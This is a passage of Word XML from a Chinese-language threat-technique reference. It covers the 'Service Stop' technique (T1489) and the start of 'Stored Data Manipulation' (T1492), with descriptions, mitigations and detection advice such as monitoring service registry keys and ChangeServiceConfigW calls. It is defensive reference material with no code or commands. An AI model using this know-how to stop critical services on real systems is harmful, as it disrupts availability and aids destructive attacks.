        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00904AC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>意外</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00904AC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F063F9" w14:textId="322797D9" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务停止</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00567ECD" w:rsidRPr="00A65911" w14:paraId="1797822C" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B380C63" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>T1489</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3040365D" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>技术：恶劣影响</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A726621" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01C4B963" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>所需权限：管理员，系统，用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7308C3AF" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>数据源：进程命令行参数，进程监控，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>indows</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>注册表，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>API</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3247FDAC" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>影响类型：可用性</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EDB8C06" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A698A1B" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DE40986" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会停止或禁用系统上的服务，使得合法用户无法使用这些服务。停止关键服务可能会抑制或停止对事件的响应，或者有助于攻击者的总体目标，从而对环境造成破坏。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204E19BF" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>攻击者可能会通过禁用对组织至关重要的单个服务（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>MSExchangeIS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）来实现目的，这将使得</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Exchange</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内容不可访问。某些情况下，攻击者可能会停止或禁用许多或所有服务，从而使系统无法使用。服务在运行时可能不允许修改其数据存储。攻击者可能会停止服务来对</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Exchange</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等服务的数据存储区进行数据破坏或数据加密攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3E7379" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2830"/>
        <w:gridCol w:w="6906"/>
      </w:tblGrid>
      <w:tr w:rsidR="00567ECD" w:rsidRPr="00567ECD" w14:paraId="39E85A37" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="49E0E6E9" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00567ECD" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00567ECD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6906" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="54075F85" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00567ECD" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00567ECD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00567ECD" w:rsidRPr="00A65911" w14:paraId="5B50EC23" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21D9D536" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00CC5590" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId265" w:history="1">
              <w:r w:rsidR="00567ECD" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>网络分区</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6906" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CD53B4E" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在与生产环境不同的网络上执行入侵检测、分析和响应系统，从而减少攻击者看到和干扰关键响应功能的机会。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00567ECD" w:rsidRPr="00A65911" w14:paraId="1FA5BE33" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A7FDB86" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00CC5590" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId266" w:history="1">
              <w:r w:rsidR="00567ECD" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>文件和目录</w:t>
              </w:r>
              <w:r w:rsidR="00567ECD" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>权限限制</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6906" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2615713B" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保有适当的流程和文件权限，防止攻击者禁用或干扰关键服务。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00567ECD" w:rsidRPr="00A65911" w14:paraId="097652C5" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="347E753B" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00CC5590" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId267" w:history="1">
              <w:r w:rsidR="00567ECD" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>注册表权限限制</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6906" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="726435F1" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保有适当的注册表权限，防止攻击者禁用或干扰关键服务。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00567ECD" w:rsidRPr="00A65911" w14:paraId="032B26D2" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B51F88E" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00CC5590" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId268" w:history="1">
              <w:r w:rsidR="00567ECD" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>用户账号管理</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6906" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32B920C6" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>限制用户账号和群组的</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>权限，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>以便只有授权的管理员才能更改和</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>配置服务</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="297D066E" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C6C7006" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27125A4B" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控进程和命令行参数来查看是否</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>有</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键进程终止或停止运行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061EA6FF" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控注册表编辑器来查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>是否</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>服务修改或与重要服务相对应的启动程序的修改。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查找已知软件、补丁周期不相关服务注册表项的修改。服务信息存储在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKLM\SYSTEM\CurrentControlSet\Services</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>路径下</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册表中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F93D81" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务二进制路径的更改或服务启动类型更改为“禁用”可能是可疑的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B978E5" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>可能会使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>带内置功能的远程访问工具来直接与</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t xml:space="preserve"> API</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交互，从而在常见</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>系统实用程序外</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>他们的功能，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>ChangeServiceConfigW</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>阻止服务启动。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5FCCC5" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存储数据操纵</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00567ECD" w:rsidRPr="00A65911" w14:paraId="11A37940" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="783F8AC3" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>T1492</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38BB5BF1" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>技术：恶劣影响</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06C30532" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02AAFE13" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>所需权限：用户，管理员，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>root</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74E1C723" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>日志，文件监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14A17850" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>影响类型：完整性</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11916384" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="476F4BDD" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13BE3F4B" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>攻击者可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>插入、删除或操纵静态数据，以便操纵外部结果或隐藏活动。攻击者可能会试图</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操纵</w:t>
      </w:r>
